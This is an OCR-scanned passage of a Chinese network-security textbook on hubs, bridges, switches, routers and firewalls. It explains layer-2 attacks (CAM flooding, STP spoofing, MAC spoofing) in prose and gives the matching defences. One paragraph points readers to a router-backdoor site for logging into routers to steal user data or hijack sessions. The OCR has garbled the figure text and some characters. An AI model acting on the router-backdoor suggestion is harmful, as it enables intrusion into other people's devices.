其 工作 原理 是 这 样 的 ,计算 机 1 要 给 计算 机 7 发 送 数据 ,计算 机 1 会 把 数据 广播 到 除 
原 端 口 以 外 的 所 有 端口 上 。 此 时 接收 到 数据 的 计算 机 中 ,除了 计算 机 ?7 外 的 计算 机 解 开 
广播 包 后 ,发现 目 标的 IP 地 址 不 是 计算 机 7 网 卡 上 的 IP 地 址 ,所 以 将 数据 帧 丢弃 。 但 计 
算 机 7 解 开 广 播 包 后 ,发现 目标 的 IP 是 本 机 网 卡 上 的 IP 地 址 , 它 就 会 将 数据 帧 从 网 卡 复 
制 到 内 存 中 ,然后 内 存在 将 其 交 给 CPU 处 理 。 

集线器 也 有 着 一 些 不 足 。 首 先 ,集线器 通信 时 以 广播 的 方式 将 用 户 数据 包 向 所 有 节 
点 发 送 ,很 可 能 带 来 数据 通信 的 不 安全 因素 ,一 些 别 有 用 心 的 人 很 容易 就 能 非法 截获 他 
人 的 数据 包 。 例 如 , 接 人 集线器 的 主机 ,可 以 利用 协议 分 析 器 对 收 到 的 数据 进行 分 析 , 则 
很 有 可 能 获取 发 往 别 的 主机 的 信息 。 其 次 ,从 集线器 的 工作 方式 可 以 看 出 , 它 在 网 络 中 
只 起 到 信号 放大 和 重 发 作用 ,其 目的 是 扩大 网 络 的 传输 范围 ,而 不 具备 信号 的 定向 传送 
能 力 , 是 一 个 标准 的 共享 式 设 备 。 其 所 有 数据 包 都 是 向 所 有 节点 同时 发 送 , 加 上 其 共享 
带宽 方式 (如 果 四 个 设备 共享 10M 的 集线器 ,那么 每 个 设备 的 理论 带宽 就 只 有 2. 5M)， 
就 更 加 可 能 造成 网 络 塞车 现象 .更 加 降低 了 网 络 执行 效率 。 接 着 ,集线器 为 非 双 工 传输 ， 
网 络 通信 效率 低 。 集 线 器 所 有 端口 连接 的 主机 全 部 处 于 一 个 冲突 域内 ,不 能 有 多 个 主机 
同时 发 送 数据 ,因此 其 同一 时 刻 每 一 个 端口 只 能 进行 一 个 方向 的 数据 通信 ,而 不 能 像 交 
换 机 那样 进行 双向 双 工 传输 ,网 络 执行 效率 低 ,不 能 满足 较 大 型 网 络 通信 需求 。 最 后 , 集 
线 器 不 能 隔离 广播 。 所 以 不 能 将 集线器 连接 成 环 状 , 否 则 广播 会 在 环 路 上 一 直 循 环 , 形 
成 广播 风暴 。 广 播 风暴 (broadcast storm) 是 指 广播 数据 充斥 网 络 无 法 处 理 , 并 占用 大 量 
网 络 带 宽 , 导 致 正常 业务 不 能 运行 ,甚至 彻底 瘫痪 。 一 个 数据 帧 或 包 被 传输 到 本 地 网 段 
(由 广播 域 定义 ) 上 的 每 个 节点 就 是 广播 ;由 于 网 络 拓扑 的 设计 和 连接 问题 ,或 其 他 原因 
导致 广播 在 网 段 内 大 量 复 制 , 传 播 数 据 帧 ,导致 网 络 性 能 下 降 , 其 至 网 络 瘫痪 ,这 就 是 广 
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播 风暴 。 

由 于 集线器 的 安全 威胁 是 设备 工作 原理 上 的 天 生 缺 陷 , 没 有 办 法 进行 补救 。 所 以 没 
有 更 有 效 的 防御 措施 ,唯一 的 办 法 是 选用 更 为 智能 的 设备 ,例如 ,采用 二 层 交 换 机 去 替代 
集线器 。 


2. 网 桥 、 二 层 交 换 机 的 工作 原理 与 安全 威胁 


1) 网 桥 

网 桥 (Bridge) 也 叫 桥接 器 ,是 连接 两 个 局 域 网 的 一 种 存储 、 转 发 设备 , 它 能 将 一 个 大 
的 局 域 网 分 割 为 多 个 网 段 ,或 将 两 个 以 上 的 局 域 网 互联 为 一 个 逻辑 局 域 网 ,使 局 域 网 上 
的 所 有 用 户 都 可 访问 服务 器 。 简 单 来 说 就 像 是 一 个 局 域 网 与 另 一 个 局 域 网 之 间 建 立 连 
接 的 桥梁 。 其 工作 于 数据 链 路 层 上 ,不 但 能 扩展 网 络 的 距离 或 范围 ,而 且 可 提高 网 络 的 
性 能 \ 可 靠 性 和 安全 性 。 

网 桥 能 够 划分 或 减少 冲突 域 ,性 能 比 集线器 良好 ;能 够 基于 MAC 地 址 进行 数据 链 路 
层 选 路 ;能 够 基于 自学 习 构建 MAC 地 址 表 ; 不 能 隔离 广播 ,所 以 不 能 让 网 桥 形成 环 路 。 
后 来 ,网 桥 被 具有 更 多 端口 .同时 也 可 隔离 冲突 域 的 交换 机 (Switch) 所 取代 。 

在 以 网 桥 连接 的 网 络 上 ,主机 间 发 送 数据 并 不 会 像 集线器 那样 将 源 主机 发 送 的 数据 
广播 到 所 有 的 接口 上 。 这 是 因为 在 网 桥 的 内 部 存 有 一 张 MAC 表 , 该 表 记 录 着 网 桥 物理 
接口 所 连接 的 主机 MAC 地 址 。 这 张 MAC 表 简 单 来 理解 就 像 是 我 们 平常 路 口 的 路 牌 ， 
我 们 只 需要 看 路 牌 就 可 以 选择 我 们 的 目的 地 ,而 不 需要 走 到 所 有 路 口 的 尽头 来 确认 是 否 
是 我 们 想 去 的 地 方 。 例 如 ,网络 中 现在 有 1、2、3、4 四 台 计 算 机 共同 连接 着 一 个 网 桥 , 对 
于 模型 我 们 可 以 参考 图 3. 9, 只 不 过 将 其 中 的 集线器 换 为 网 桥 。 计 算 机 1 给 计算 机 4 发 
送 数据 ,数据 进入 网 桥 时 ,网 桥 通 过 查询 MAC 地 址 得 知 计算 机 4 对 应 的 物理 接口 ,所 以 
网 桥 就 将 数据 直接 转发 到 该 物理 接口 ,而 不 需要 把 数据 再 广播 到 所 有 接口 。 计 算 机 2 与 
计算 机 3 的 信道 没有 受到 干扰 ,因此 在 计算 机 1 与 计算 机 4 交换 数据 时 ,计算 机 2 与 计算 
机 3 也 可 以 同时 交换 数据 。 

也 许 有 人 会 问 : 计算 机 难道 不 是 同时 通信 吗 ? 因为 计算 机 发 送 数据 是 以 毫秒 级 计 
算 , 人 无 法 感知 其 中 细微 的 差别 ,所 以 很 多 人 认为 在 一 个 网 络 中 计算 机 是 可 以 同时 通信 ， 
共用 一 根 线 路 的 。 这 个 说 法 是 不 准确 的 。 计 算 机 确实 是 共用 一 根 线路 ,但 却 是 轮流 使 
用 。 例 如 ,图 3.9 中 ,所 有 计算 机 用 集线器 连接 在 一 起 , 当 其 中 一 台 计 算 机 向 别 的 计算 机 
发 送 数据 时 ,因为 集线器 要 广播 到 所 有 地 址 ,因此 占用 了 所 有 的 信道 。 此 时 若是 非 目的 
主机 的 计算 机 要 发 送 数据 给 别 的 计算 机 , 它 会 先 检查 线路 是 否 繁忙 ,如 果 繁 忙 则 不 能 发 
送 。 因 此 可 以 得 出 一 个 结论 : 以 太 网 上 的 多 个 主机 在 一 个 冲突 域内 ,同一 时 刻 只 能 有 一 
个 主机 向 另 一 个 主机 发 送 数据 ,如 果 违 反 了 该 原则 就 会 有 冲突 产生 。 在 以 太 网 中 ,如 果 
某 个 CSMA/CD 网 络 上 的 两 台 计 算 机 在 同时 通信 时 会 发 生 冲 突 , 那 么 这 个 CSMA/CD 网 
络 就 是 一 个 冲突 域 (collision domain)。 图 3. 9 中 的 计算 机 都 处 在 一 个 冲突 域内 。 

当 网 桥 的 MAC 地 址 表 不 完整 时 ,网 桥 是 无 法 利用 MAC 地 址 表 进行 选 路 转发 的 ,此 
时 网 桥 只 能 跟 集 线 器 一 样 将 数据 帧 广播 到 除 源 接口 外 的 所 有 接口 。 此 时 网 桥 的 广播 只 
是 单纯 的 ARP 广播 ,不 像 集线器 的 广播 , 它 没有 带 真实 数据 ,并 且 只 广播 一 次 ,为 的 是 构 
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造 MAC 地 址 表 , 利 用 网 桥 的 MAC 地 址 表 自 学 习 功 能 记录 计算 机 的 源 MAC 地 址 对 应 的 
网 桥接 口 。 简 单 来 说 ,这 种 情况 就 像 是 十 字 路 口 刚 开始 设立 路 牌 ,我 们 先 得 去 到 每 个 地 
方才 知道 每 个 路 口 到 底 通 向 何 处 ,路 牌 才 能 有 个 正确 的 名 字 。 在 MAC 地 址 表 被 成 功 构 
造 后 ,网 桥 不 再 进行 广播 ,此 时 就 跟 之 前 说 的 一 样 ,利用 MAC 地 址 表 进 行 快速 选 路 并 转 
发 。 网 桥 是 不 能 成 环 的 ,因为 网 桥 无 法 隔离 广播 ,成 环 会 形成 广播 风暴 ,并 且 会 导致 
MAC 地 址 表 自 学 习 错 误 。 但 在 实际 工程 中 ,网 桥 通常 需要 物理 链 路 成 环 , 此 时 也 可 以 靠 
生成 树 技术 来 解决 网 桥 成 环 引发 的 问题 。 

2) 二 层 交 换 机 

二 层 交换 机 是 一 种 代替 网 桥 的 产物 ,其 工作 原理 与 网 桥 是 一 样 的 ,所 实现 的 功能 基 
本 类 似 。 差 别 在 网 桥 实现 功能 是 靠 网 桥 内 的 软件 来 完成 的 ,因此 会 出 现 瓶颈 现象 。 但 二 
层 交 换 机 采用 了 集成 电路 来 决定 交换 逻辑 算法 的 ,没有 瓶颈 现象 ,转发 速度 更 快 ,接口 更 
密集 。 因 此 二 层 交换 机 替代 了 网 桥 。 

我 们 之 前 说 到 了 ,一 个 典型 的 网 络 侵入 者 会 向 该 交换 机 提供 大 量 的 无 效 MAC 源 地 
址 ,直到 硬件 地 址 表格 被 填 满 。 这 也 被 称 为 内 容 寻 址 存储 器 (CAM) 表 格 淹没 。CAM 是 
一 种 专用 存储 器 件 ,我 们 之 前 所 说 的 MAC 地 址 就 存储 在 CAM 表 当 中 , 除 此 之 外 还 包括 
对 应 的 端口 号 ,端口 所 属 的 虚拟 局 域 网 等 。 当 交换 机 收 到 主机 发 来 的 一 个 帧 ,就 会 查看 
帧 中 的 源 MAC 地 址 ,并 查找 CAM 表 , 如 果 有 就 什么 也 不 做 ,开始 转发 数据 。 如 果 没 有 
就 存 人 CAM 表 , 以 便当 其 他 人 向 这 个 MAC 地 址 上 发 送 数 据 时 ,可 以 决定 向 哪个 端口 转 
发 数据 。 一 般 CAM 表 的 容量 可 以 容纳 许多 MAC 记录 ,但 不 同 的 交换 机 品牌 与 等 级 也 
是 有 许多 差异 的 。 如 果 CAM 表 在 短 时 间 内 被 攻击 人 侵 者 充满 ,那么 交换 机 就 会 CAM 
表 溢 出 ,导致 正常 的 记录 无 法 被 交换 机 成 功 的 学 习 到 ,交换 机 就 无 法 选取 正常 的 MAC 地 
址 与 端口 对 应 关系 的 选 路 。 

生成 树 协议 可 用 于 交换 网 络 中 以 防止 在 以 太 网 拓扑 结构 中 产生 桥接 循环 。 通 过 攻 
击 生 成 树 协议 ,网络 攻击 者 希望 将 自己 的 系统 伪装 成 该 拓扑 结构 中 的 根 网 桥 。 要 达到 此 
目的 ,网 络 攻击 者 需要 向 外 广播 生成 树 协议 配置 .拓扑 结构 改变 网 桥 协议 数据 单元 
(BPDU) ,企图 迫使 生成 树 进 行 重新 计算 。 网 络 攻击 者 系统 发 出 的 BPDU 声称 发 出 攻击 
的 网 桥 优 先 权 较 低 。 如 果 获 得 成 功 ,该 网 络 攻击 者 能 够 获得 各 种 各 样 的 数据 帧 。 

MAC 欺骗 攻击 的 过 程 中 ,已 知 某 其 他 主机 的 MAC 地 址 会 被 用 来 使 目标 交换 机 向 攻 
击 者 转发 以 该 主机 为 目的 地 址 的 数据 帧 。 通 过 发 送 带 有 该 主机 以 太 网 源 地 址 的 单个 数 
据 帧 的 办 法 ,网络 攻击 者 改写 了 CAM 表格 中 的 条 目 .使 得 交换 机 将 以 该 主机 为 目的 地 址 
的 数据 包 转 发 给 该 网 络 攻击 者 。 除 非 该 主机 向 外 发 送信 息 , 否 则 它 不 会 收 到 任何 信息 。 
当 该 主机 向 外 发 送信 息 的 时 候 ,CAM 表 中 对 应 的 条 目 会 被 再 次 改写 ,以 便 它 能 恢复 到 原 
始 的 端口 。 

为 了 防御 对 于 二 层 交 换 机 的 攻击 ,我 们 一 般 要 实现 端口 安全 与 在 端口 上 阻止 单 播 洪 
范 。 对 于 端口 安全 我 们 可 以 在 交换 机 上 配置 端口 安全 选项 ,这 么 做 可 以 防止 CAM 表 淹 
没 攻击 。 该 选择 项 要 么 可 以 提供 特定 交换 机 端口 的 MAC 地 址 说 明 , 要 么 可 以 提供 一 个 
交换 机 端口 可 以 获得 的 MAC 地 址 的 数目 方面 的 说 明 。 当 无 效 的 MAC 地 址 在 该 端口 被 
检测 出 来 之 后 ,该 交换 机 要 么 可 以 阻止 所 提供 的 MAC 地 址 ,要 么 可 以 关闭 该 端口 。 对 于 
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该 选项 的 设置 同时 也 防止 MAC 欺骗 攻击 。 端 口 安全 命令 能 够 提供 指定 系统 MAC 地 址 
连接 到 特定 端口 的 功能 。 该 命令 在 端口 的 安全 遭 到 破坏 时 ,还 能 够 提供 指定 需要 采取 何 
种 措施 的 能 力 。 然 而 ,如 同 防止 CAM 表 淹 没 攻 击 一 样 ,在 每 一 个 端口 上 都 要 指定 一 个 
MAC 地 址 是 一 种 并 不 足够 好 的 解决 方案 。 

而 要 防止 操纵 生成 树 协议 的 攻击 ,需要 使 用 根 目录 保护 和 BPDU 保护 加 强 命令 来 保 
持 网 络 中 主 网 桥 的 位 置 不 发 生 改 变 , 同 时 也 可 以 强化 生成 树 协议 的 域 边界 。 根 目录 保护 
功能 可 提供 保持 主 网 桥 位 置 不 变 的 方法 。 生 成 树 协议 BPDU 保护 使 得 网 络 设计 者 能 够 
保持 有 源 网 络 拓扑 结构 的 可 预测 性 。 尽 管 BPDU 保护 也 许 看 起 来 是 没有 必要 的 ,因为 管 
理 员 可 以 将 网 络 优先 权 调 至 0, 但 仍然 不 能 保证 它 将 被 选 做 主 网 桥 ,因为 可 能 存在 一 个 优 
先 权 为 0, 但 ID 却 更 低 的 网 桥 。 使 用 在 面向 用 户 的 端口 中 ,BPDU 保护 能 够 发 挥 出 最 佳 
的 用 途 ,能 够 防止 攻击 者 利用 伪造 交换 机 进行 网 络 扩展 。 


3, 路 由 器 的 原理 与 安全 威胁 


路 由 器 (Router) ,是 连接 因特网 中 各 局 域 网 广域网 的 设备 , 它 会 根据 信道 的 情况 自 
动 选择 和 设 定 路 由 ,以 最 佳 路 径 , 按 前 后 顺序 发 送信 号 。 在 理解 路 由 器 的 工作 原理 之 前 
我 们 应 先 了 解 什么 叫 作 路 由 。 路 由 (routing) 是 指 分 组 从 源 到 目的 地 时 ,决定 端 到 端 路 径 
的 网 络 范围 的 进程 。 我 们 可 以 用 个 形象 .生动 的 比喻 来 解释 这 个 过 程 。 就 像 是 寄 信 ,我 
们 的 信和 就 是 数据 ,将 信 放 入 信封 并 填写 收 件 人 的 地 址 与 寄 件 人 的 地 址 ,这 就 像 是 OSI 第 
三 层 中 封装 IP 报 文 ,在 报头 中 写 入 源 IP 地 址 ( 寄 件 人 地 址 ) 与 目标 IP 地 址 ( 收 件 人 地 
址 ) 。IP 数据 报 如 图 3. 10 所 示 。 


位 0 4 8 16 19 24 31 
版 本 [首部 长 度 | 。 区 分 服务 总 长 度 
站 标识 标志 片 偏 移 
首部 4 0 字 节 ) 生存 时 间 “| 协议 首部 检验 和 
源 地 址 
目的 地 址 
可 变 部 分 二 可 选 字段 (长 度 可 变 ) 填充 于 
数据 部 分 
首部 数据 部 分 
EE 下 数据 报 一 
发 送 在 前 


3.10 ”IP 数据 报 


当 信 密 封 好 后 ,我 们 自然 要 将 其 投递 到 最 近 的 公用 邮箱 以 使 邮政 收取 信件 。 在 网 络 
中 也 是 这 样 ,目标 IP 与 源 IP 往往 距离 很 远 ,不 在 同一 个 子 网 内 ,这 时 就 要 将 源 IP 产生 的 
数据 报 文 投递 到 距离 最 近 的 路 由 。 我 们 投递 完 信封 ,邮局 收取 邮箱 里 的 邮件 之 后 会 将 所 
有 信件 进行 汇总 . 归 类 ,对 运送 邮件 做 准备 。 路 由 器 也 是 这 样 ,路 由 器 将 所 有 网 络 的 路 由 
进行 汇总 或 策略 化 后 再 发 出 本 地 的 自治 区 域 。 信 件 可 以 采用 不 同 的 方式 运送 ,例如 , 空 
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运 、 火 车 .轮船 等 。 在 网 络 中 也 是 这 样 ,不 同 的 路 由 可 能 会 采取 不 同 的 策略 以 及 不 同 的 成 
本 路 径 开销 ,从 某 一 条 路 径 将 数据 报 文 送 到 目标 所 在 的 区 域 。 当 信件 到 达 目 标 所 在 的 区 
域 后 ,又 由 当地 的 邮政 再 次 进行 汇总 、 分 类 之 后 分 发 下 去 ,直到 目标 客户 收取 邮件 。 在 网 
络 中 同样 是 如 此 , 当 数据 报 文 到 达 目 标 所 在 的 区 域 .运营 商 的 路 由 器 会 将 报 文 再 次 分 发 
下 去 ,直到 转发 给 了 目标 IP。 

这 个 例子 能 让 人 较为 容易 地 理解 路 由 器 的 工作 原理 。 但 详细 细节 是 这 样 的 , 当 数据 
报 文 发 出 前 ,主机 会 对 源 IP 的 子 网 掩 码 与 目标 IP 进行 与 运算 ,若是 两 个 主机 不 在 同一 个 
子 网 中 。 这 种 情况 下 ,主机 确定 两 个 IP 间 通 信 需 要 路 由 器 进行 路 由 的 。 此 时 ,主机 利用 
默认 网 关 接口 确定 路 由 器 的 位 置 后 ,将 报 文 投递 到 该 路 由 器 。 路 由 器 中 存放 着 路 由 表 ， 
路 由 表 或 称 路 由 择 域 信 息 库 (RIB) ,是 一 个 存储 在 路 由 器 或 者 联网 计算 机 中 的 电子 表格 
(文件 ) 或 类 数据 库 。 路 由 表 存储 着 指向 特定 网 络 地 址 的 路 径 ( 在 有 些 情况 下 ,还 记录 有 
路 径 的 路 由 度量 值 ) 。 路 由 表 中 含有 网 络 周边 的 拓扑 信息 。 该 路 由 器 会 根据 路 由 表 选 择 
到 达 目 标 子 网 的 最 佳 路 径 后 进行 转发 。 

目前 路 由 器 已 经 广泛 应 用 于 各 行 各 业 ,各 种 不 同 档 次 的 产品 已 成 为 实现 各 种 骨干 网 
内 部 连接 、 骨 干 网 间 互 联 和 骨干 网 与 互联 网 互联 互通 业务 的 主力 军 。 路 由 和 交换 机 之 间 
的 主要 区 别 具 体 如 下 : 

1) 工作 层次 不 同 

最 初 的 交换 机 是 工作 在 OSI 开放 体系 结构 的 数据 链 路 层 , 也 就 是 第 二 层 , 而 路 由 器 
一 开始 就 设计 工作 在 OSI 模型 的 网 络 层 , 也 就 是 第 三 层 。 由 于 交换 机 工作 在 OSI 的 第 二 
层 ( 数 据 链 路 层 ) ,所 以 它 的 工作 原理 比较 简单 ,而 路 由 器 工作 在 OSI 的 第 三 层 (网 络 层 ) 
可 以 得 到 更 多 的 协议 信息 ,路 由 器 可 以 做 出 更 加 智能 的 转发 决策 。 

2) 数据 转发 所 依据 的 对 象 不 同 

交换 机 是 利用 物理 地 址 或 者 说 MAC 地 址 来 确定 转发 数据 的 目的 地 址 。 而 路 由 器 则 
是 利用 不 同 网 络 的 ID 号 ( 即 IP 地 址 ?来 确定 数据 转发 的 地 址 。IP 地 址 是 在 软件 中 实现 
的 ,描述 的 是 设备 所 在 的 网 络 , 有 时 这 些 第 三 层 的 地 址 也 称 为 协议 地 址 或 者 网 络 地 址 。 
MAC 地 址 通常 是 硬件 自 带 的 ,由 网 卡 生 产 商 来 分 配 的 ,而 且 已 经 固化 到 了 网 卡 中 去 ,一 
般 来 说 是 不 可 更 改 的 。 而 IP 地 址 则 通常 由 网 络 管理 员 或 系统 自动 分 配 。 

3) 路 由 器 可 以 分 割 广播 域 

传统 的 交换 机 只 能 分 割 冲突 域 ,不 能 分 割 广播 域 ,而 路 由 器 可 以 分 割 广播 域 。 由 交 
换 机 连接 的 网 段 仍 属于 同一 个 广播 域 ,广播 数据 包 会 在 交换 机 连接 的 所 有 网 段 上 传播 ， 
在 某 些 情况 下 会 导致 通信 拥挤 和 安全 漏洞 。 连 接 到 路 由 器 上 的 网 段 会 被 分 配 成 不 同 的 
广播 域 , 广 播 数据 不 会 穿 过 路 由 器 。 虽 然 第 三 层 以 上 交换 机 具有 虚拟 局 域 网 功能 ,也 可 
以 分 割 广播 域 , 但 是 各 子 广播 域 之 间 是 不 能 通信 交流 的 ,它们 之 间 的 交流 仍然 需要 路 
由 器 。 

4) 路 由 器 提供 了 防火 墙 的 服务 

路 由 器 仅仅 转发 特定 地 址 的 数据 包 , 不 传送 .不 支持 路 由 协议 的 数据 包 传 送 和 未 知 
目标 网 络 数据 包 的 传送 ,从 而 可 以 防止 广播 风暴 。 

交换 机 一 般 用 于 局 域 网 与 局 域 网 间 的 连接 ,交换 机 归于 网 桥 , 是 数据 链 路 层 的 设备 ， 
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有 些 交换 机 也 可 实现 第 三 层 的 交换 。 路 由 器 用 于 广域网 与 广域网 之 间 的 连接 ,可 以 解决 
异性 网 络 之 间 转 发 分 组 ,作用 于 网 络 层 。 他 们 只 是 从 一 条 线路 上 接受 输入 分 组 ,然后 向 
另 一 条 线路 转发 。 这 两 条 线路 可 能 分 属于 不 同 的 网 络 , 并 采用 不 同 协议 。 相 比较 而 言 ， 
路 由 器 的 功能 较 交换 机 要 强大 .但 速度 相对 也 慢 , 价 格 昂贵 ,第 三 层 交换 机 既 有 交换 机 线 
速 转发 报 文 能 力 , 又 有 路 由 器 良好 的 控制 功能 ,因此 得 以 广泛 应 用 。 

那么 路 由 器 是 怎么 被 攻击 的 呢 ? 这 些 网 络 设备 看 似 安 全 ,但 是 却 有 不 少 的 漏洞 与 后 
门 。 从 最 近来 说 ,安全 公司 FireEye 在 许多 国家 的 思科 路 由 器 上 发 现 SYNful Knock 后 
门 程序 。 路 由 器 的 后 门 或 者 漏洞 该 如 何 查看 ? 常见 的 方法 有 访问 routerpwn. com。 其 
实 , 不 少 国内 外 路 由 器 厂家 ,为 了 后 期 维护 管理 方便 ,都 在 管理 固件 中 留 下 了 后 门 。 这 个 
网 站 包括 对 许多 路 由 器 后 门 或 漏洞 的 总 结 。 利 用 里 面 所 提供 的 信息 ,我 们 可 以 直接 登录 
到 留 有 后 门 或 漏洞 的 路 由 器 后 台 , 穷 取 用 户 信息 ,甚至 进行 会 话 劫持 。 


4. 防火 墙 的 原理 与 安全 威胁 


防火 墙 技术 是 对 外 界 的 网 络 信息 进行 过 滤 、 访 问 控制 特殊 的 互联 网 装备 ,通过 自动 
清除 对 内 部 网 络 (将 用 户 使 用 的 网 络 称 为 内 部 网 络 ,外 界 网 络 则 被 称 为 外 部 网 络 ) 存 在 风 
险 的 通信 数据 ,达到 保护 企业 内 部 信息 安全 的 目的 。 防 火 墙 的 作用 我 们 可 归结 为 如 下 
几 点 : 

。 限制 他 人 进入 内 部 网 络 ,过滤 掉 不 安全 服务 和 非法 用 户 。 

。 防止 入 侵 者 接近 防御 设施 。 

。 限定 用 户 访问 特殊 站 点 。 

。 为 监视 Internet 安全 提供 方便 。 

1) 防火 墙 的 分 类 

防火 墙 实现 技术 虽然 出 现 了 许多 ,但 总 体 来 讲 可 分 为 “ 包 过 滤 型 "和 “应 用 代理 型 "两 
大 类 (其 中 包 过 滤 型 又 分 为 简单 包 过 滤 型 和 状态 检测 型 ,应 用 代理 型 又 分 为 应 用 网 关 型 
和 自 适应 代理 型 )。 前 者 以 以 色 列 的 Checkpoint 防火 墙 和 美国 Cisco 公司 的 PIX 防火 墙 
为 代表 ;后 者 以 美国 NAI 公司 的 Gauntlet 防火 墙 为 代表 。 

(1) 包 过 滤 型 防火 墙 。 

包 过 滤 型 防火 墙 工 作 在 OSI 网 络 参 考 模型 的 网 络 层 和 传输 层 , 它 根据 数据 包头 源 地 
址 \ 目 的 地 址 、 端 口号 和 协议 类 型 等 标志 确定 是 否 允 许 通 过 ,如 TCP、UDP、ICMP 等 ,并 
通过 不 同 的 TCP 协议 端口 号 识别 基于 TCP 的 各 种 应 用 等 。 只 有 满足 过 滤 条 件 的 数据 包 
才 被 转发 到 相应 的 目的 地 ,其 余数 据 包 则 被 从 数据 流 中 丢弃 。 

包 过 滤 方 式 是 一 种 通用 、 廉 价 和 有 效 的 安全 手段 。 之 所 以 通用 ,是 因为 它 不 是 针对 
各 个 具体 的 网 络 服务 采取 特殊 的 处 理 方式 ,而 是 适用 于 所 有 网 络 服务 ;之 所 以 廉价 ,是 因 
为 大 多 数 路 由 器 都 提供 数据 包 过 滤 功 能 ,所 以 这 类 防火 墙 多 数 是 由 路 由 器 集成 的 ;之 所 
以 有 效 ,是 因为 它 能 很 大 程度 上 满足 绝 大 多 数 企 业 安全 要 求 。 

但 如 果 有 黑客 进行 IP 地 址 欺骗 ,伪装 成 合法 的 IP 地 址 , 包 过 滤 防 火 墙 将 无 法 进行 识 
别 ,因为 包 过 滤 防 火 墙 不 能 分 析 “ 会 话 状 态 ”, 只 能 针对 IP 报 文 的 源 IP、 目 标 IP、 源 端口 和 
目标 端口 进行 静态 检测 。 
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根据 包 过 滤 技 术 的 特点 ,参照 隔离 交换 系统 通用 体系 结构 ,可 以 得 出 ,采用 包 过 滤 技 
术 的 隔离 交换 系统 的 数据 接收 和 转发 模块 所 面向 的 是 单个 网 络 数 据 包 。 根 据 对 数据 包 
的 处 理 策略 的 不 同 , 包 过 滤 型 防火 墙 可 分 为 : 简单 包 过 滤 型 和 状态 检测 型 。 包 过 滤 型 防 
火 墙 工 作 原 理 如 图 3. 11 所 示 。 


一 IP 下 
本 TCP et 只 检查 报头 
开始 攻击 二 


3.11 包 过 滤 防 火 墙 工作 原理 


(2) 应 用 网 关 防火 墙 。 

应 用 级 网 关 防 火 墙 技术 又 称 * 代 理 服 务 器 ”, 主 要 是 针对 OSI 七 层 参考 模型 中 的 应 用 
层 而 设计 的 ,如 检测 HTTP 与 FTP。 其 对 所 有 应 用 层 的 信息 数据 包 进 行 检 查 ,其 决策 过 
程 也 将 放 和 人 检查 的 内 容 。 这 样 ,网 络 的 安全 性 就 大 大 提高 了 。 然 而 ,应 用 网 关 防 火 墙 是 
通过 拆 解 Client/Server 模式 实现 其 功能 。 一 组 Client/Server 通信 所 需 的 连接 是 两 个 : 
一 个 是 从 Client 到 防火 墙 , 另 一 个 是 从 防火 墙 到 Server。 另 外 ,每 个 代理 的 应 用 进程 都 
不 相同 ,一 个 后 台 运 行 的 服务 程序 也 需要 单独 设置 ,对 每 个 新 的 应 用 ,如 果 要 使 用 该 服务 
必须 添加 针对 此 应 用 的 服务 程序 。 所 以 ,应 用 网 关 防 火 墙 可 伸缩 性 差 , 不 易 操 作 ,是 它 的 
缺点 之 一 ,如 图 3. 12 所 示 ,为 应 用 网 关 防 火 墙 工 作 原 理 。 


i IP 
Ee TCP 2 
元 反攻 浊 中 | 二 -= 二 | 只 检查 数据 


3.12 应 用 网 关 防 火 墙 工 作 原理 


(3) 状态 检测 防火 墙 。 

状态 检测 不 是 单纯 的 如 包 过 滤 防 火 墙 那样 只 进行 IP 地 址 和 几 个 孤立 信息 的 检测 ， 
而 是 检测 一 个 完整 的 “会 话 状 态 ”。IP 地 址 可 以 伪造 ,但 是 状态 信息 却 不 容易 伪造 。 该 防 
火 墙 性 能 优良 ,兼顾 简单 包 过 滤 防 火 墙 的 优点 ,又 对 应 用 透明 。 对 于 安全 性 ,状态 监测 防 
火 墙 也 有 了 大 幅度 升级 。 简 单 包 过 滤 防 火 墙 仅仅 考察 进出 网 络 的 数据 包 ,而 不 关心 数据 
包 状 态 ,会 给 网 络 黑客 留 下 可 乘 之 机 。 而 状态 检测 防火 墙 会 将 进出 网 络 的 数据 当成 一 个 
个 的 事件 处 理 , 在 防火 墙 的 核心 部 分 建立 状态 连接 表 , 维 护 连接 。 可 以 说 状态 检测 包 过 
滤 防 火 墙 规范 了 网 络 层 和 传输 层 行为 ,而 应 用 代理 型 防火 墙 则 是 规范 了 特定 的 应 用 协议 
上 的 行为 ,如 图 3. 13 所 示 。 


一 有 一 一 一 一 一 
el -i | 三 -= 二 | 只 检查 报关 
a TO ee 
开始 攻击 | 


建立 连接 状态 表 


3.13 状态 检测 防火 墙 工 作 原理 
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(4) 复合 型 防火 墙 。 

它 是 综合 了 状态 检测 与 透明 代理 的 新 一 代 防 火 墙 。 复合 型 防火 墙 进一步 基于 ASIC 
架构 ,把 防 病毒 ,内容 过 滤 整 合 到 防火 墙 里 ,其 中 还 包括 VPN、IDS 功能 ,多 单元 融 为 一 
体 ,是 一 种 新 突破 。 常 规 的 防火 墙 并 不 能 防止 隐蔽 在 网 络 流量 里 的 攻击 ,而 复合 型 防火 
墙 在 网 络 界 面 对 应 用 层 进行 扫描 ,把 防 病毒 ,内容 过 滤 与 防火 墙 综合 实现 ,这 体现 了 网 络 
与 信息 安全 新 的 发 展 趋势 和 思维 。 复 合 型 防火 墙 之 所 以 能 够 实现 实时 在 网 络 边缘 部 署 
病毒 防护 .内容 过 滤 等 应 用 层 服 务 措施 ,是 因为 它 在 网 络 边界 实施 OSI 第 七 层 的 内 容 扫 
描 , 如 图 3. 14 所 示 。 


42 IP 
时 和 二 二 :三 二 三 检查 整个 
ee 三 报 文 内 容 
开始 攻击 
建立 连接 状态 表 


3.14 复合 型 防火 墙 工作 原理 


(5) 按 区 域 划分 的 防火 墙 。 

@ 非 安全 区 域 C(Untrust, 外 部 网 络 ): 通常 指 Internet 区 域 , 在 防火 墙 划 分 的 3 个 区 
域 中 ,安全 性 最 低 ,也 就 是 防火 墙 的 外 部 接口 所 连接 的 网 络 。 

@ 安全 区 域 (Trust, 内 部 网 络 ): 通常 指 企 业内 部 区 域 。 防 火 墙 所 划分 的 3 个 区 域 
中 其 安全 性 最 高 的 ,也 是 防火 墙 的 内 部 。 一 般 情 况 下 ,该 区 域 可 以 任意 访问 比 自己 安全 
级 别 更 低 的 区 域 。 如 外 部 区 域 和 DMZ 区 域 。 但 是 不 允许 低 安 全 区 域 主动 访问 该 区 域 。 

@ DMZ 区 域 (Demilitarized Zone, 非 武装 军事 区 ): 它 是 为 了 解决 安装 防火 墙 后 外 
部 网 络 的 访问 用 户 不 能 访问 内 部 网 络 服 务 器 的 问题 ,而 设立 的 一 个 非 安 全 系统 与 安全 系 
